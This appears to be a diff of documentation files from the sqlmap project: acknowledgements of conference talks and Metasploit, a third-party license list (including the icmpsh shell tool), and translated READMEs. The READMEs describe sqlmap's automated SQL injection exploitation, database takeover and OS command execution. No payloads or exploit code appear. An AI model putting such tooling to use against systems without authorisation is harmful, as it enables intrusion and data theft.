Black Hat team, <info(at)blackhat.com>
|
||||||
|
* for the opportunity to present my research titled 'Advanced SQL injection to operating system full control' at Black Hat Europe 2009 Briefings on April 16, 2009 in Amsterdam (NL). I unveiled and demonstrated some of the sqlmap 0.7 release candidate version new features during my presentation
|
||||||
|
* Homepage: http://goo.gl/BKfs7
|
||||||
|
* Slides: http://goo.gl/Dh65t
|
||||||
|
* White paper: http://goo.gl/spX3N
|
||||||
|
|
||||||
|
SOURCE Conference team, <press(at)sourceconference.com>
|
||||||
|
* for the opportunity to present my research titled 'Expanding the control over the operating system from the database' at SOURCE Conference 2009 on September 21, 2009 in Barcelona (ES). I unveiled and demonstrated some of the sqlmap 0.8 release candidate version new features during my presentation
|
||||||
|
* Homepage: http://goo.gl/IeXV4
|
||||||
|
* Slides: http://goo.gl/OKnfj
|
||||||
|
|
||||||
|
AthCon Conference team, <cfp(at)athcon.org>
|
||||||
|
* for the opportunity to present my research titled 'Got database access? Own the network!' at AthCon Conference 2010 on June 3, 2010 in Athens (GR). I unveiled and demonstrated some of the sqlmap 0.8 version features during my presentation
|
||||||
|
* Homepage: http://goo.gl/Fs71I
|
||||||
|
* Slides: http://goo.gl/QMfjO
|
||||||
|
|
||||||
|
Metasploit Framework development team, <msfdev(at)metasploit.com>
|
||||||
|
* for their powerful tool Metasploit Framework, used by sqlmap, among others things, to create the shellcode and establish an out-of-band connection between sqlmap and the database server
|
||||||
|
* Homepage: http://www.metasploit.com
|
||||||
|
|
||||||
|
OWASP Board, <info(at)owasp.org>
|
||||||
|
* for sponsoring part of the sqlmap development in the context of OWASP Spring of Code 2007
|
||||||
|
* Homepage: http://www.owasp.org
|
||||||
314
doc/THIRD-PARTY.md
Normal file
314
doc/THIRD-PARTY.md
Normal file
@@ -0,0 +1,314 @@
|
|||||||
|
This file lists bundled packages and their associated licensing terms.
|
||||||
|
|
||||||
|
# BSD
|
||||||
|
|
||||||
|
* The Ansistrm library located under thirdparty/ansistrm/.
|
||||||
|
Copyright (C) 2010-2012, Vinay Sajip.
|
||||||
|
* The Beautiful Soup library located under thirdparty/beautifulsoup/.
|
||||||
|
Copyright (C) 2004-2010, Leonard Richardson.
|
||||||
|
* The ClientForm library located under thirdparty/clientform/.
|
||||||
|
Copyright (C) 2002-2007, John J. Lee.
|
||||||
|
Copyright (C) 2005, Gary Poster.
|
||||||
|
Copyright (C) 2005, Zope Corporation.
|
||||||
|
Copyright (C) 1998-2000, Gisle Aas.
|
||||||
|
* The Colorama library located under thirdparty/colorama/.
|
||||||
|
Copyright (C) 2013, Jonathan Hartley.
|
||||||
|
* The Fcrypt library located under thirdparty/fcrypt/.
|
||||||
|
Copyright (C) 2000, 2001, 2004 Carey Evans.
|
||||||
|
* The Odict library located under thirdparty/odict/.
|
||||||
|
Copyright (C) 2005, Nicola Larosa, Michael Foord.
|
||||||
|
* The Oset library located under thirdparty/oset/.
|
||||||
|
Copyright (C) 2010, BlueDynamics Alliance, Austria.
|
||||||
|
Copyright (C) 2009, Raymond Hettinger, and others.
|
||||||
|
* The PrettyPrint library located under thirdparty/prettyprint/.
|
||||||
|
Copyright (C) 2010, Chris Hall.
|
||||||
|
* The SocksiPy library located under thirdparty/socks/.
|
||||||
|
Copyright (C) 2006, Dan-Haim.
|
||||||
|
|
||||||
|
````
|
||||||
|
Redistribution and use in source and binary forms, with or without
|
||||||
|
modification, are permitted provided that the following conditions are met:
|
||||||
|
- Redistributions of source code must retain the above copyright
|
||||||
|
notice, this list of conditions and the following disclaimer.
|
||||||
|
- Redistributions in binary form must reproduce the above copyright
|
||||||
|
notice, this list of conditions and the following disclaimer in the
|
||||||
|
documentation and/or other materials provided with the distribution.
|
||||||
|
- Neither the name of the <organization> nor the
|
||||||
|
names of its contributors may be used to endorse or promote products
|
||||||
|
derived from this software without specific prior written permission.
|
||||||
|
|
||||||
|
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
|
||||||
|
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
|
||||||
|
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
|
||||||
|
DISCLAIMED. IN NO EVENT SHALL <COPYRIGHT HOLDER> BE LIABLE FOR ANY
|
||||||
|
DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
|
||||||
|
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
|
||||||
|
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
|
||||||
|
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
|
||||||
|
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
|
||||||
|
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
|
||||||
|
````
|
||||||
|
|
||||||
|
# LGPL
|
||||||
|
|
||||||
|
* The Chardet library located under thirdparty/chardet/.
|
||||||
|
Copyright (C) 2008, Mark Pilgrim.
|
||||||
|
* The Gprof2dot library located under thirdparty/gprof2dot/.
|
||||||
|
Copyright (C) 2008-2009, Jose Fonseca.
|
||||||
|
* The KeepAlive library located under thirdparty/keepalive/.
|
||||||
|
Copyright (C) 2002-2003, Michael D. Stenner.
|
||||||
|
* The MultipartPost library located under thirdparty/multipart/.
|
||||||
|
Copyright (C) 2006, Will Holcomb.
|
||||||
|
* The XDot library located under thirdparty/xdot/.
|
||||||
|
Copyright (C) 2008, Jose Fonseca.
|
||||||
|
* The icmpsh tool located under extra/icmpsh/.
|
||||||
|
Copyright (C) 2010, Nico Leidecker, Bernardo Damele.
|
||||||
|
|
||||||
|
````
|
||||||
|
GNU LESSER GENERAL PUBLIC LICENSE
|
||||||
|
Version 3, 29 June 2007
|
||||||
|
|
||||||
|
Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/>
|
||||||
|
Everyone is permitted to copy and distribute verbatim copies
|
||||||
|
of this license document, but changing it is not allowed.
|
||||||
|
|
||||||
|
|
||||||
|
This version of the GNU Lesser General Public License incorporates
|
||||||
|
the terms and conditions of version 3 of the GNU General Public
|
||||||
|
License, supplemented by the additional permissions listed below.
|
||||||
|
|
||||||
|
0. Additional Definitions.
|
||||||
|
|
||||||
|
As used herein, "this License" refers to version 3 of the GNU Lesser
|
||||||
|
General Public License, and the "GNU GPL" refers to version 3 of the GNU
|
||||||
|
General Public License.
|
||||||
|
|
||||||
|
"The Library" refers to a covered work governed by this License,
|
||||||
|
other than an Application or a Combined Work as defined below.
|
||||||
|
|
||||||
|
An "Application" is any work that makes use of an interface provided
|
||||||
|
by the Library, but which is not otherwise based on the Library.
|
||||||
|
Defining a subclass of a class defined by the Library is deemed a mode
|
||||||
|
of using an interface provided by the Library.
|
||||||
|
|
||||||
|
A "Combined Work" is a work produced by combining or linking an
|
||||||
|
Application with the Library. The particular version of the Library
|
||||||
|
with which the Combined Work was made is also called the "Linked
|
||||||
|
Version".
|
||||||
|
|
||||||
|
The "Minimal Corresponding Source" for a Combined Work means the
|
||||||
|
Corresponding Source for the Combined Work, excluding any source code
|
||||||
|
for portions of the Combined Work that, considered in isolation, are
|
||||||
|
based on the Application, and not on the Linked Version.
|
||||||
|
|
||||||
|
The "Corresponding Application Code" for a Combined Work means the
|
||||||
|
object code and/or source code for the Application, including any data
|
||||||
|
and utility programs needed for reproducing the Combined Work from the
|
||||||
|
Application, but excluding the System Libraries of the Combined Work.
|
||||||
|
|
||||||
|
1. Exception to Section 3 of the GNU GPL.
|
||||||
|
|
||||||
|
You may convey a covered work under sections 3 and 4 of this License
|
||||||
|
without being bound by section 3 of the GNU GPL.
|
||||||
|
|
||||||
|
2. Conveying Modified Versions.
|
||||||
|
|
||||||
|
If you modify a copy of the Library, and, in your modifications, a
|
||||||
|
facility refers to a function or data to be supplied by an Application
|
||||||
|
that uses the facility (other than as an argument passed when the
|
||||||
|
facility is invoked), then you may convey a copy of the modified
|
||||||
|
version:
|
||||||
|
|
||||||
|
a) under this License, provided that you make a good faith effort to
|
||||||
|
ensure that, in the event an Application does not supply the
|
||||||
|
function or data, the facility still operates, and performs
|
||||||
|
whatever part of its purpose remains meaningful, or
|
||||||
|
|
||||||
|
b) under the GNU GPL, with none of the additional permissions of
|
||||||
|
this License applicable to that copy.
|
||||||
|
|
||||||
|
3. Object Code Incorporating Material from Library Header Files.
|
||||||
|
|
||||||
|
The object code form of an Application may incorporate material from
|
||||||
|
a header file that is part of the Library. You may convey such object
|
||||||
|
code under terms of your choice, provided that, if the incorporated
|
||||||
|
material is not limited to numerical parameters, data structure
|
||||||
|
layouts and accessors, or small macros, inline functions and templates
|
||||||
|
(ten or fewer lines in length), you do both of the following:
|
||||||
|
|
||||||
|
a) Give prominent notice with each copy of the object code that the
|
||||||
|
Library is used in it and that the Library and its use are
|
||||||
|
covered by this License.
|
||||||
|
|
||||||
|
b) Accompany the object code with a copy of the GNU GPL and this license
|
||||||
|
document.
|
||||||
|
|
||||||
|
4. Combined Works.
|
||||||
|
|
||||||
|
You may convey a Combined Work under terms of your choice that,
|
||||||
|
taken together, effectively do not restrict modification of the
|
||||||
|
portions of the Library contained in the Combined Work and reverse
|
||||||
|
engineering for debugging such modifications, if you also do each of
|
||||||
|
the following:
|
||||||
|
|
||||||
|
a) Give prominent notice with each copy of the Combined Work that
|
||||||
|
the Library is used in it and that the Library and its use are
|
||||||
|
covered by this License.
|
||||||
|
|
||||||
|
b) Accompany the Combined Work with a copy of the GNU GPL and this license
|
||||||
|
document.
|
||||||
|
|
||||||
|
c) For a Combined Work that displays copyright notices during
|
||||||
|
execution, include the copyright notice for the Library among
|
||||||
|
these notices, as well as a reference directing the user to the
|
||||||
|
copies of the GNU GPL and this license document.
|
||||||
|
|
||||||
|
d) Do one of the following:
|
||||||
|
|
||||||
|
0) Convey the Minimal Corresponding Source under the terms of this
|
||||||
|
License, and the Corresponding Application Code in a form
|
||||||
|
suitable for, and under terms that permit, the user to
|
||||||
|
recombine or relink the Application with a modified version of
|
||||||
|
the Linked Version to produce a modified Combined Work, in the
|
||||||
|
manner specified by section 6 of the GNU GPL for conveying
|
||||||
|
Corresponding Source.
|
||||||
|
|
||||||
|
1) Use a suitable shared library mechanism for linking with the
|
||||||
|
Library. A suitable mechanism is one that (a) uses at run time
|
||||||
|
a copy of the Library already present on the user's computer
|
||||||
|
system, and (b) will operate properly with a modified version
|
||||||
|
of the Library that is interface-compatible with the Linked
|
||||||
|
Version.
|
||||||
|
|
||||||
|
e) Provide Installation Information, but only if you would otherwise
|
||||||
|
be required to provide such information under section 6 of the
|
||||||
|
GNU GPL, and only to the extent that such information is
|
||||||
|
necessary to install and execute a modified version of the
|
||||||
|
Combined Work produced by recombining or relinking the
|
||||||
|
Application with a modified version of the Linked Version. (If
|
||||||
|
you use option 4d0, the Installation Information must accompany
|
||||||
|
the Minimal Corresponding Source and Corresponding Application
|
||||||
|
Code. If you use option 4d1, you must provide the Installation
|
||||||
|
Information in the manner specified by section 6 of the GNU GPL
|
||||||
|
for conveying Corresponding Source.)
|
||||||
|
|
||||||
|
5. Combined Libraries.
|
||||||
|
|
||||||
|
You may place library facilities that are a work based on the
|
||||||
|
Library side by side in a single library together with other library
|
||||||
|
facilities that are not Applications and are not covered by this
|
||||||
|
License, and convey such a combined library under terms of your
|
||||||
|
choice, if you do both of the following:
|
||||||
|
|
||||||
|
a) Accompany the combined library with a copy of the same work based
|
||||||
|
on the Library, uncombined with any other library facilities,
|
||||||
|
conveyed under the terms of this License.
|
||||||
|
|
||||||
|
b) Give prominent notice with the combined library that part of it
|
||||||
|
is a work based on the Library, and explaining where to find the
|
||||||
|
accompanying uncombined form of the same work.
|
||||||
|
|
||||||
|
6. Revised Versions of the GNU Lesser General Public License.
|
||||||
|
|
||||||
|
The Free Software Foundation may publish revised and/or new versions
|
||||||
|
of the GNU Lesser General Public License from time to time. Such new
|
||||||
|
versions will be similar in spirit to the present version, but may
|
||||||
|
differ in detail to address new problems or concerns.
|
||||||
|
|
||||||
|
Each version is given a distinguishing version number. If the
|
||||||
|
Library as you received it specifies that a certain numbered version
|
||||||
|
of the GNU Lesser General Public License "or any later version"
|
||||||
|
applies to it, you have the option of following the terms and
|
||||||
|
conditions either of that published version or of any later version
|
||||||
|
published by the Free Software Foundation. If the Library as you
|
||||||
|
received it does not specify a version number of the GNU Lesser
|
||||||
|
General Public License, you may choose any version of the GNU Lesser
|
||||||
|
General Public License ever published by the Free Software Foundation.
|
||||||
|
|
||||||
|
If the Library as you received it specifies that a proxy can decide
|
||||||
|
whether future versions of the GNU Lesser General Public License shall
|
||||||
|
apply, that proxy's public statement of acceptance of any version is
|
||||||
|
permanent authorization for you to choose that version for the
|
||||||
|
Library.
|
||||||
|
````
|
||||||
|
|
||||||
|
# PSF
|
||||||
|
|
||||||
|
* The Magic library located under thirdparty/magic/.
|
||||||
|
Copyright (C) 2011, Adam Hupp.
|
||||||
|
|
||||||
|
````
|
||||||
|
PSF LICENSE AGREEMENT FOR PYTHON 2.7.3
|
||||||
|
|
||||||
|
This LICENSE AGREEMENT is between the Python Software Foundation (“PSF”),
|
||||||
|
and the Individual or Organization (“Licensee”) accessing and otherwise
|
||||||
|
using Python 2.7.3 software in source or binary form and its associated
|
||||||
|
documentation.
|
||||||
|
Subject to the terms and conditions of this License Agreement, PSF hereby
|
||||||
|
grants Licensee a nonexclusive, royalty-free, world-wide license to
|
||||||
|
reproduce, analyze, test, perform and/or display publicly, prepare
|
||||||
|
derivative works, distribute, and otherwise use Python 2.7.3 alone or in any
|
||||||
|
derivative version, provided, however, that PSF’s License Agreement and
|
||||||
|
PSF’s notice of copyright, i.e., “Copyright © 2001-2012 Python Software
|
||||||
|
Foundation; All Rights Reserved” are retained in Python 2.7.3 alone or in
|
||||||
|
any derivative version prepared by Licensee.
|
||||||
|
In the event Licensee prepares a derivative work that is based on or
|
||||||
|
incorporates Python 2.7.3 or any part thereof, and wants to make the
|
||||||
|
derivative work available to others as provided herein, then Licensee hereby
|
||||||
|
agrees to include in any such work a brief summary of the changes made to
|
||||||
|
Python 2.7.3.
|
||||||
|
PSF is making Python 2.7.3 available to Licensee on an “AS IS” basis. PSF
|
||||||
|
MAKES NO REPRESENTATIONS OR WARRANTIES, EXPRESS OR IMPLIED. BY WAY OF
|
||||||
|
EXAMPLE, BUT NOT LIMITATION, PSF MAKES NO AND DISCLAIMS ANY REPRESENTATION
|
||||||
|
OR WARRANTY OF MERCHANTABILITY OR FITNESS FOR ANY PARTICULAR PURPOSE OR THAT
|
||||||
|
THE USE OF PYTHON 2.7.3 WILL NOT INFRINGE ANY THIRD PARTY RIGHTS.
|
||||||
|
PSF SHALL NOT BE LIABLE TO LICENSEE OR ANY OTHER USERS OF PYTHON 2.7.3 FOR
|
||||||
|
ANY INCIDENTAL, SPECIAL, OR CONSEQUENTIAL DAMAGES OR LOSS AS A RESULT OF
|
||||||
|
MODIFYING, DISTRIBUTING, OR OTHERWISE USING PYTHON 2.7.3, OR ANY DERIVATIVE
|
||||||
|
THEREOF, EVEN IF ADVISED OF THE POSSIBILITY THEREOF.
|
||||||
|
This License Agreement will automatically terminate upon a material breach
|
||||||
|
of its terms and conditions.
|
||||||
|
Nothing in this License Agreement shall be deemed to create any relationship
|
||||||
|
of agency, partnership, or joint venture between PSF and Licensee. This
|
||||||
|
License Agreement does not grant permission to use PSF trademarks or trade
|
||||||
|
name in a trademark sense to endorse or promote products or services of
|
||||||
|
Licensee, or any third party.
|
||||||
|
By copying, installing or otherwise using Python 2.7.3, Licensee agrees to
|
||||||
|
be bound by the terms and conditions of this License Agreement.
|
||||||
|
````
|
||||||
|
|
||||||
|
# MIT
|
||||||
|
|
||||||
|
* The bottle web framework library located under thirdparty/bottle/.
|
||||||
|
Copyright (C) 2012, Marcel Hellkamp.
|
||||||
|
* The PageRank library located under thirdparty/pagerank/.
|
||||||
|
Copyright (C) 2010, Corey Goldberg.
|
||||||
|
* The Termcolor library located under thirdparty/termcolor/.
|
||||||
|
Copyright (C) 2008-2011, Volvox Development Team.
|
||||||
|
|
||||||
|
````
|
||||||
|
Permission is hereby granted, free of charge, to any person obtaining
|
||||||
|
a copy of this software and associated documentation files (the
|
||||||
|
"Software"), to deal in the Software without restriction, including
|
||||||
|
without limitation the rights to use, copy, modify, merge, publish,
|
||||||
|
distribute, sublicense, and/or sell copies of the Software, and to
|
||||||
|
permit persons to whom the Software is furnished to do so, subject to
|
||||||
|
the following conditions:
|
||||||
|
|
||||||
|
The above copyright notice and this permission notice shall be
|
||||||
|
included in all copies or substantial portions of the Software.
|
||||||
|
|
||||||
|
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
|
||||||
|
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
|
||||||
|
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
|
||||||
|
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
|
||||||
|
LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
|
||||||
|
OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
|
||||||
|
WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
|
||||||
|
|
||||||
|
````
|
||||||
|
|
||||||
|
# Public domain
|
||||||
|
|
||||||
|
* The PyDes library located under thirdparty/pydes/.
|
||||||
|
Copyleft 2009, Todd Whiteman.
|
||||||
52
doc/translations/README-es-MX.md
Normal file
52
doc/translations/README-es-MX.md
Normal file
@@ -0,0 +1,52 @@
|
|||||||
|
# sqlmap
|
||||||
|
|
||||||
|
[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [](https://twitter.com/sqlmap)
|
||||||
|
|
||||||
|
sqlmap es una herramienta para pruebas de penetración "penetration testing" de software libre que automatiza el proceso de detección y explotación de fallos mediante inyección de SQL además de tomar el control de servidores de bases de datos. Contiene un poderoso motor de detección, así como muchas de las funcionalidades escenciales para el "pentester" y una amplia gama de opciones desde la recopilación de información para identificar el objetivo conocido como "fingerprinting" mediante la extracción de información de la base de datos, hasta el acceso al sistema de archivos subyacente para ejecutar comandos en el sistema operativo a través de conexiones alternativas conocidas como "Out-of-band".
|
||||||
|
|
||||||
|
Capturas de Pantalla
|
||||||
|
---
|
||||||
|

|
||||||
|
|
||||||
|
Visita la [colección de capturas de pantalla](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) que demuestra algunas de las características en la documentación(wiki).
|
||||||
|
|
||||||
|
Instalación
|
||||||
|
---
|
||||||
|
|
||||||
|
Se puede descargar el "tarball" más actual haciendo clic [aquí](https://github.com/sqlmapproject/sqlmap/tarball/master) o el "zipball" [aquí](https://github.com/sqlmapproject/sqlmap/zipball/master).
|
||||||
|
|
||||||
|
Preferentemente, se puede descargar sqlmap clonando el repositorio [Git](https://github.com/sqlmapproject/sqlmap):
|
||||||
|
|
||||||
|
git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
||||||
|
|
||||||
|
sqlmap funciona con las siguientes versiones de [Python](http://www.python.org/download/) ** 2.6.x** y ** 2.7.x** en cualquier plataforma.
|
||||||
|
|
||||||
|
Uso
|
||||||
|
---
|
||||||
|
|
||||||
|
Para obtener una lista de opciones básicas:
|
||||||
|
|
||||||
|
python sqlmap.py -h
|
||||||
|
|
||||||
|
Para obtener una lista de todas las opciones:
|
||||||
|
|
||||||
|
python sqlmap.py -hh
|
||||||
|
|
||||||
|
Se puede encontrar una muestra de su funcionamiento [aquí](https://asciinema.org/a/46601).
|
||||||
|
Para obtener una visión general de las capacidades de sqlmap, así como un listado funciones soportadas y descripción de todas las opciones y modificadores, junto con ejemplos, se recomienda consultar el [manual de usuario](https://github.com/sqlmapproject/sqlmap/wiki).
|
||||||
|
|
||||||
|
Enlaces
|
||||||
|
---
|
||||||
|
|
||||||
|
* Página principal: http://sqlmap.org
|
||||||
|
* Descargar: [. tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) o [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
||||||
|
* Fuente de Cambios "Commit RSS feed": https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
||||||
|
* Seguimiento de problemas "Issue tracker": https://github.com/sqlmapproject/sqlmap/issues
|
||||||
|
* Manual de usuario: https://github.com/sqlmapproject/sqlmap/wiki
|
||||||
|
* Preguntas frecuentes (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
||||||
|
* Subscripción a la lista de correo: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
|
||||||
|
* Fuente de la lista de correo "RSS feed": http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
|
||||||
|
* Archivos de lista de correo: http://news.gmane.org/gmane.comp.security.sqlmap
|
||||||
|
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
||||||
|
* Demostraciones: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
|
||||||
|
* Imágenes: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
||||||
53
doc/translations/README-gr-GR.md
Normal file
53
doc/translations/README-gr-GR.md
Normal file
@@ -0,0 +1,53 @@
|
|||||||
|
# sqlmap
|
||||||
|
|
||||||
|
[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [](https://twitter.com/sqlmap)
|
||||||
|
|
||||||
|
Το sqlmap είναι πρόγραμμα ανοιχτού κώδικα, που αυτοματοποιεί την εύρεση και εκμετάλλευση ευπαθειών τύπου SQL Injection σε βάσεις δεδομένων. Έρχεται με μια δυνατή μηχανή αναγνώρισης ευπαθειών, πολλά εξειδικευμένα χαρακτηριστικά για τον απόλυτο penetration tester όπως και με ένα μεγάλο εύρος επιλογών αρχίζοντας από την αναγνώριση της βάσης δεδομένων, κατέβασμα δεδομένων της βάσης, μέχρι και πρόσβαση στο βαθύτερο σύστημα αρχείων και εκτέλεση εντολών στο απευθείας στο λειτουργικό μέσω εκτός ζώνης συνδέσεων.
|
||||||
|
|
||||||
|
Εικόνες
|
||||||
|
----
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
Μπορείτε να επισκεφτείτε τη [συλλογή από εικόνες](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) που επιδεικνύουν κάποια από τα χαρακτηριστικά.
|
||||||
|
|
||||||
|
Εγκατάσταση
|
||||||
|
----
|
||||||
|
|
||||||
|
Έχετε τη δυνατότητα να κατεβάσετε την τελευταία tarball πατώντας [εδώ](https://github.com/sqlmapproject/sqlmap/tarball/master) ή την τελευταία zipball πατώντας [εδώ](https://github.com/sqlmapproject/sqlmap/zipball/master).
|
||||||
|
|
||||||
|
Κατά προτίμηση, μπορείτε να κατεβάσετε το sqlmap κάνοντας κλώνο το [Git](https://github.com/sqlmapproject/sqlmap) αποθετήριο:
|
||||||
|
|
||||||
|
git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
||||||
|
|
||||||
|
Το sqlmap λειτουργεί χωρίς περαιτέρω κόπο με την [Python](http://www.python.org/download/) έκδοσης **2.6.x** και **2.7.x** σε όποια πλατφόρμα.
|
||||||
|
|
||||||
|
Χρήση
|
||||||
|
----
|
||||||
|
|
||||||
|
Για να δείτε μια βασική λίστα από επιλογές πατήστε:
|
||||||
|
|
||||||
|
python sqlmap.py -h
|
||||||
|
|
||||||
|
Για να πάρετε μια λίστα από όλες τις επιλογές πατήστε:
|
||||||
|
|
||||||
|
python sqlmap.py -hh
|
||||||
|
|
||||||
|
Μπορείτε να δείτε ένα δείγμα λειτουργίας του προγράμματος [εδώ](https://asciinema.org/a/46601).
|
||||||
|
Για μια γενικότερη άποψη των δυνατοτήτων του sqlmap, μια λίστα των υποστηριζόμενων χαρακτηριστικών και περιγραφή για όλες τις επιλογές, μαζί με παραδείγματα, καλείστε να συμβουλευτείτε το [εγχειρίδιο χρήστη](https://github.com/sqlmapproject/sqlmap/wiki).
|
||||||
|
|
||||||
|
Σύνδεσμοι
|
||||||
|
----
|
||||||
|
|
||||||
|
* Αρχική σελίδα: http://sqlmap.org
|
||||||
|
* Λήψεις: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ή [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
||||||
|
* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
||||||
|
* Προβλήματα: https://github.com/sqlmapproject/sqlmap/issues
|
||||||
|
* Εγχειρίδιο Χρήστη: https://github.com/sqlmapproject/sqlmap/wiki
|
||||||
|
* Συχνές Ερωτήσεις (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
||||||
|
* Εγγραφή σε Mailing list: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
|
||||||
|
* Mailing list RSS feed: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
|
||||||
|
* Mailing list αρχείο: http://news.gmane.org/gmane.comp.security.sqlmap
|
||||||
|
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
||||||
|
* Demos: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
|
||||||
|
* Εικόνες: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
||||||
53
doc/translations/README-hr-HR.md
Normal file
53
doc/translations/README-hr-HR.md
Normal file
@@ -0,0 +1,53 @@
|
|||||||
|
# sqlmap
|
||||||
|
|
||||||
|
[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [](https://twitter.com/sqlmap)
|
||||||
|
|
||||||
|
sqlmap je alat namijenjen za penetracijsko testiranje koji automatizira proces detekcije i eksploatacije sigurnosnih propusta SQL injekcije te preuzimanje poslužitelja baze podataka. Dolazi s moćnim mehanizmom za detekciju, mnoštvom korisnih opcija za napredno penetracijsko testiranje te široki spektar opcija od onih za prepoznavanja baze podataka, preko dohvaćanja podataka iz baze, do pristupa zahvaćenom datotečnom sustavu i izvršavanja komandi na operacijskom sustavu korištenjem tzv. "out-of-band" veza.
|
||||||
|
|
||||||
|
Slike zaslona
|
||||||
|
----
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
Možete posjetiti [kolekciju slika zaslona](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) gdje se demonstriraju neke od značajki na wiki stranicama.
|
||||||
|
|
||||||
|
Instalacija
|
||||||
|
----
|
||||||
|
|
||||||
|
Možete preuzeti zadnji tarball klikom [ovdje](https://github.com/sqlmapproject/sqlmap/tarball/master) ili zadnji zipball klikom [ovdje](https://github.com/sqlmapproject/sqlmap/zipball/master).
|
||||||
|
|
||||||
|
Po mogućnosti, možete preuzeti sqlmap kloniranjem [Git](https://github.com/sqlmapproject/sqlmap) repozitorija:
|
||||||
|
|
||||||
|
git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
||||||
|
|
||||||
|
sqlmap radi bez posebnih zahtjeva korištenjem [Python](http://www.python.org/download/) verzije **2.6.x** i/ili **2.7.x** na bilo kojoj platformi.
|
||||||
|
|
||||||
|
Korištenje
|
||||||
|
----
|
||||||
|
|
||||||
|
Kako biste dobili listu osnovnih opcija i prekidača koristite:
|
||||||
|
|
||||||
|
python sqlmap.py -h
|
||||||
|
|
||||||
|
Kako biste dobili listu svih opcija i prekidača koristite:
|
||||||
|
|
||||||
|
python sqlmap.py -hh
|
||||||
|
|
||||||
|
Možete pronaći primjer izvršavanja [ovdje](https://asciinema.org/a/46601).
|
||||||
|
Kako biste dobili pregled mogućnosti sqlmap-a, liste podržanih značajki te opis svih opcija i prekidača, zajedno s primjerima, preporučen je uvid u [korisnički priručnik](https://github.com/sqlmapproject/sqlmap/wiki).
|
||||||
|
|
||||||
|
Poveznice
|
||||||
|
----
|
||||||
|
|
||||||
|
* Početna stranica: http://sqlmap.org
|
||||||
|
* Preuzimanje: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ili [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
||||||
|
* RSS feed promjena u kodu: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
||||||
|
* Prijava problema: https://github.com/sqlmapproject/sqlmap/issues
|
||||||
|
* Korisnički priručnik: https://github.com/sqlmapproject/sqlmap/wiki
|
||||||
|
* Najčešće postavljena pitanja (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
||||||
|
* Pretplata na mailing listu: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
|
||||||
|
* RSS feed mailing liste: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
|
||||||
|
* Arhiva mailing liste: http://news.gmane.org/gmane.comp.security.sqlmap
|
||||||
|
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
||||||
|
* Demo: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
|
||||||
|
* Slike zaslona: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
||||||
54
doc/translations/README-id-ID.md
Normal file
54
doc/translations/README-id-ID.md
Normal file
@@ -0,0 +1,54 @@
|
|||||||
|
# sqlmap
|
||||||
|
|
||||||
|
